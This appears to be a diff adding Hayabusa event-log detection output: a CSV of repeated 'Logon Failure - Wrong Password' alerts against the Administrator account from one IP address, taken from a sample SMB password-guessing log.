+2016-09-20 01:50:46.248 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Xa7kMCNz0bEGTBqX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:46.293 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HSxTQ4HsZt2DeYVe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:46.341 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YxHpSQwFSV4hveVM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:46.372 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: n3OwzSPomxZLoCe6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:46.416 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: e9IfwDZIfYT6A50K | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:46.463 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JOf6DbRX4zlNqLdb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:46.508 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 00kXrnJNH40NyoYL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:46.549 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nsNHcb9pnpdRgeL7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:46.592 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ucMhgxMXy9Ch1jNm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:46.637 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Cfi3ZaLTECJgjM9x | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:46.680 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: usugjEEBHlhJvOyu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:46.720 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WQ1pM2CVLt5ITVD5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:46.746 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NIboW7hNljF3HPpk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:46.795 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rOk5W4rkSYRRw4xS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:46.858 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AJTfcwd8rnFc06iF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:46.930 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6sm415W5zkvjdnTV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:46.981 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KEiSbtlmW4ou1mc7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:47.012 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xWeZV5pHt94adwUy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:47.052 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5np7HeCPAFTDdTXJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:47.088 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gXbe2jEJVtwaQXlr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:47.134 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7hZFiUCJnaBdHcw4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:47.176 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: a71wyo41KV1ZoT7p | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:47.236 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ogB17WdeOiC19rqn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:47.286 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ANOLPWG12lkW39Ei | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:47.332 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Y1vf7OUxb6TH3Q4H | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:47.368 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bxU5yumSieUzSgzH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:47.401 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: v9K5EoWWASU8SlSe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:47.445 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PwZLRPFxaFWwjZEe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:47.500 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8fXgFFb3HTMunsoi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:47.549 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: R1RozAr1uhux4cYW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:47.586 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: n7EmuUSv03RnhKsF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:47.629 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jw410HEW8EC3MC9f | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:47.680 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UTYp8cEbt3Yggo3J | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:47.727 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yWJVzgYLWIo7SGCZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:47.773 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DP13jPdW5Gdl8z56 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:47.813 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LNXOWjHmMDhfFVon | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:47.908 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kka1RiF3f7Nhkf8x | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:47.959 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2o90lG6attzWU4ZN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:47.998 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PyPK9kuJdflQ4RKe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:48.028 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: a9I3El7d7anR0kIz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:48.068 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eDUMTEfNhFuuqMle | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:48.110 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: e0F70d1WstkqnQgA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:48.148 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Bm0txApQSp1U42N3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:48.180 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JeEe5ENSIZnfc3FG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:48.228 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oasE54Z1FlpswY0d | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:48.277 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Bhje1BgvxOlG28JM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:48.321 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: L9iTIv4UQ4En9RA2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:48.356 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Mg8KFm1lCeImj8Sb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:48.400 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: h17Fz1s6GJki61jg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:48.440 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6Pjjn4FAkJn4h32r | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:48.483 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ARVx3FAAww8Gmfvc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:48.533 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sYIwPg5k1wpvWobN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:48.572 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0sfhYQ54SjC4JTX7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:48.604 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nfZYnUPV40FShcqt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:48.648 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XYbvWVCT0tFixZTH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:48.696 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XC6Vmz0ql8myDuGa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:48.744 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PJ8JvuvZZzwSOzFo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:48.784 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: s06yKaogI6FYkXla | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:48.828 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pCjOc7PguxwNKoQR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:48.876 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BX5IosnpdYZK5xZj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:48.905 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gfMjB1epEm64wVEX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:48.947 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pb4FVO2SKsoMyt1K | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:49.003 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1qoRw2jjFx4F6Wx6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:49.048 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ImiLeiteLoSw32I0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:49.083 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KcIYD47BIEP8gB0L | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:49.120 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lUAeB15aWamcaZ8L | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:49.161 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KFOKiSDWc1dWjzge | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:49.211 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hqyMtzjKSJEtEAdx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:49.251 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WtHsItpyFHQxvLWm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:49.287 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RdGMqIhUGHj23Xm2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:49.328 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BfE5LVmrPaAFLwBR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:49.368 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: b1swKSla5gkdOwxH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:49.408 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kL9MdVnRVogiP7hF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:49.456 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aQ0hRdwZvC5PBcXl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
